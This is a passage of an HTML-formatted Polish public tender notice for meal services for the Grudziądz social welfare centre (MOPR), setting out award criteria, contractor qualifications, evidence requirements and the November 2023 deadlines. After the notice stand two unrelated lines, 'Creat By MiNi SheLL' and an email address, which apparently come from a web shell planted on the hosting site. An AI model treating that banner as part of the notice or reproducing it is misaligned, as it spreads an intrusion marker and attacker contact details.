kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kucharza</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Niepowtarzalność posiłków</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają<br/>wykluczeniu i spełniają warunki udziału w postępowaniu w zakresie:<br/>a) uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej, o ile wynika to z odrębnych przepisów Zamawiający uzna, że warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada aktualną decyzję właściwego terenowo Organu Państwowej Inspekcji Sanitarnej zatwierdzającą lokal gastronomiczny do prowadzenia działalności gastronomicznej w zakresie przygotowywania i wydawania dań lub inny<br/>równoważny dokument potwierdzający ww. uprawnienia.<br/>Ocena spełniania warunku zostanie dokonana wg reguły spełnia/nie spełnia<br/>na podstawie złożonego dokumentu.<br/>b) zdolności technicznej lub zawodowej<br/>Zamawiający uzna, że warunek zostanie spełniony, jeżeli Wykonawca wykaże,<br/>że:<br/>- w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub<br/>nadal wykonuje co najmniej 2 usługi w zakresie przygotowywania i<br/>wydawania gorących posiłków o wartości co najmniej 100.000,00 zł brutto<br/>każda usługa;<br/>- dysponuje osobami niezbędnymi do wykonania zamówienia, tj. osobami<br/>posiadającymi odpowiednie kwalifikacje zawodowe i wykształcenie<br/>niezbędne do wykonania zamówienia publicznego, tj. minimum 1 osobą<br/>zatrudnioną na stanowisku kucharza posiadającą wykształcenie minimum<br/>zawodowe gastronomiczne i doświadczenie minimum 1 roku w zawodzie<br/>kucharza.<br/>Ocena spełniania warunku zostanie dokonana wg reguły spełnia/nie spełnia<br/>na podstawie złożonych wykazów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawcę, którego oferta zostanie najwyżej oceniona Zamawiający wezwie<br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na<br/>dzień ich złożenia:<br/>a) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem. W przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>b) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>W przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami<br/>lub zawarł wiążące porozumienie w sprawie spłat tych należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawcę, którego oferta zostanie najwyżej oceniona Zamawiający<br/>wezwie do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>a) aktualnej decyzji właściwego terenowo Organu Państwowej Inspekcji Sanitarnej zatwierdzającej lokal gastronomiczny do prowadzenia działalności<br/>gastronomicznej w zakresie przygotowywania i wydawania dań lub innego<br/>równoważnego dokumentu potwierdzającego ww. uprawnienia,<br/>b) wykazu wykonanych usług, a w przypadku świadczeń powtarzających<br/>się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane – załącznik nr 3 do SWZ wraz<br/>z załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub<br/>ciągłych są wykonywane. Jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy,<br/>W sytuacji, gdy Wykonawca wykonywał usługi wyszczególnione w wykazie<br/>na rzecz Zamawiającego, nie ma obowiązku przedkładania dla tych zamówień<br/>dowodów, o których mowa powyżej.<br/>c) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług<br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie o spełnianiu warunków udziału w postępowaniu i niepodleganiu wykluczeniu składa każdy z Wykonawców.<br/>Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Oferta musi być podpisana przez osoby upoważnione do reprezentowania Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez pełnomocnika Wykonawcy.<br/>Jeżeli osoba podpisująca ofertę działa na podstawie pełnomocnictwa,<br/>to pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty. Wykonawca, który<br/>składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych Wykonawców, należy załączyć do oferty. Pełnomocnictwo powinno zawierać<br/>w szczególności wskazanie postępowania o zamówienie publiczne, którego dotyczy, wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby oraz ustanowionego pełnomocnika i zakresu jego umocowania.<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj.<br/>podpisanej kwalifikowanym podpisem elektronicznym przez osobę posiadającą uprawnienia notariusza. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonania zmian postanowień umowy, w zakresie:<br/>a) zmiany przepisów prawnych istotnych dla realizacji zamówienia,<br/>b) zmiany lokalu gastronomicznego – gdy wystąpią szczególnie uzasadnione<br/>okoliczności, których zaistnienia strony umowy nawet przy dołożeniu należytej staranności nie mogły przewidzieć w chwili zawarcia umowy, powodujące,<br/>że wydawanie klientom MOPR posiłków obiadowych w danym punkcie<br/>jest niemożliwe. W takich okolicznościach Wykonawca niezwłocznie wskaże<br/>Zamawiającemu inny lokal gastronomiczny, położony w tym samym rejonie miasta Grudziądza.<br/>Dopuszcza się możliwość zmiany ustaleń umowy w stosunku do treści oferty Wykonawcy w zakresie określonym w<br/>projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z oświadczeniem należy złożyć za pośrednictwem platformy zakupowej https://platformazakupowa.pl/pn/gpp_grudziadz na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-30 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy Wykonawcę na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com